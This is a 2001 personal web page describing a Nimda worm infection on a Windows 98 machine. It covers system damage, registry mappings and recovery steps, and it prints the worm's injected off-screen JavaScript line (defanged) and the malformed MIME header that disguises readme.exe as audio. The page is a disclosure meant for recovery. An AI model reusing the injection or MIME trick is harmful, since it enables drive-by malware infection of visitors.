eml Viruses
9-19-01
Thank you Microsoft,
it is now possible to spread viruses via html files.
It is simple really, just use javascript to open an eml file in a new window.
Well, I've just been hit with the W32.NIMDA.A@MM computer worm.
No big surprise here.
The infection appears to be pretty wide spread.
This
Symantec press release
says that "its kind of bad",
the details are here.
Damage
| HTML Code
| Registry
| MIME Header
| References
Damage to My System
- New infected system file
C:\WIN98\SYSTEM\load.exe (run via system.ini)
- Replaced system file
C:\WIN98\SYSTEM\riched20.dll (called by WinWord and others)
- The Internet Explorer History was deleted (C:\WIN98\History).
- Two of the Windows Explorer preferences were changed
- Do not show hidden or system files - was - Show all files
- Hide file extensions for known file types - was - unchecked
- 2 eml files added to PWS executable directories
- Several .tmp and .tmp.exe files in C:\WIN98\temp
- MS Word is broke (this may be a separate problem)
- 2 main menu selections are gone - View and Insert
- Find is missing from the edit menu
- Tool bar customize (right click and select customize)
no longer works
riched20.dll should be 422KB,
after infection it was 56 kb.
Since this dll is used by various applications,
some parts of the system no longer worked.
I used the System File Checker (c:\win98\system\sfc.exe) to repair
this problem (ie, replace the file).
At the time of the infection
I was running the Microsoft Personal Web Server (PWS).
The following 2 files were written to directories
configured in PWS to contain executable content.
setup.eml 78 KB
multimonitor.eml 78 KB
These 2 identical files are actually email messages
which contain the mime encoded worm readme.exe.
However, because the mime type is
listed as an audio file,
Microsoft exchange will try to play the "sound" file.
Of course, Windows will realize that it is actually an exe
file and execute it WITHOUT ASKING YOU.
This is the system.ini line which loads the worm.
shell=explorer.exe load.exe -dontrunold
The MS Word problem was solved by locating and re-naming
normal.dot. When re-started, MS Word simply created a new one
and only the changes I had made were lost.
HTML Code
The following code is from an infected web page.
I won't identify the url since it is a
very respected site that was obviously hacked.
Simply visiting the page infected MY machine with the virus.
(I added the "xx" to the extension so that my example should be safe.
<![CDATA[
The rest of the page is here
The following was added as a single line at the bottom of the page.
I have reformatted it so that it is easier to read.
<html>
<script language="JavaScript">
window.open("readme.xxeml", null, "resizable=no,top=6000,left=6000")
</script>
</html>
]]>
Notice that the window is opened way off the screen so that the user
is kept clueless.
I can't believe that javascript can be used to open another application.
(On the other hand, VBScript does allow this sort of thing.)
On the plus side, my Symantec virus check software located several infected
html files in the Internet Explorer cache.
Since all of them were from a single web site, I'm pretty sure
that those are the files that infected my system.
Relevant Registry Entries
This is the real problem -
these registry keys allow Windows to execute
files without your permission.
[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\Microsoft Internet Mail Message\shell\open\command]
@="\"C:\\PROGRAM FILES\\OUTLOOK EXPRESS\\MSIMN.EXE\" /eml:%1"
[HKEY_CLASSES_ROOT\.mht]
@="mhtmlfile"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\.mhtml]
@="mhtmlfile"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\.nws]
@="Microsoft Internet News Message"
"Content Type"="message/rfc822"
[HKEY_CLASSES_ROOT\Microsoft Internet News Message\shell\open\command]
@="\"C:\\PROGRAM FILES\\OUTLOOK EXPRESS\\MSIMN.EXE\" /nws:%1"
[HKEY_CLASSES_ROOT\MIME\Database\Content Type\message/rfc822]
"CLSID"="{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}"
[HKEY_CLASSES_ROOT\CLSID\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\InProcServer32]
@="C:\\WIN98\\SYSTEM\\MSHTML.DLL"
"ThreadingModel"="Apartment"
As you can see, there are 4 at risk extensions - eml mht mhtml nws.
Based on experiments,
it appears that the real danger is through the mime mapping.
MIME Header
This is the malformed header from the eml file.
<![CDATA[
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
The mime code is here.
--====_ABC1234567890DEF_====
]]>
Other Extensions
This exploit is not limited to just exe files.
It can be used by all the executable file extensions -
pif and scr (Screen Saver) are quite common.
See McAfee's notes on the
W32/Badtrans@MM virus
for numerous examples.
Note
I know that Microsoft has gone way out of the way to describe these
problems without giving specific data.
From a general security point of view, I support that approach.
However, since I know of companies loosing whole days because of these
problems, I decided to publish explicit details (as far as I know them).
This is no longer a "hide the details" issue,
we're now in disaster recovery
and explicit details are necessary to accomplish that.
Most of the details are also given by
Symantec.
References
Author:
Robert Clemenzi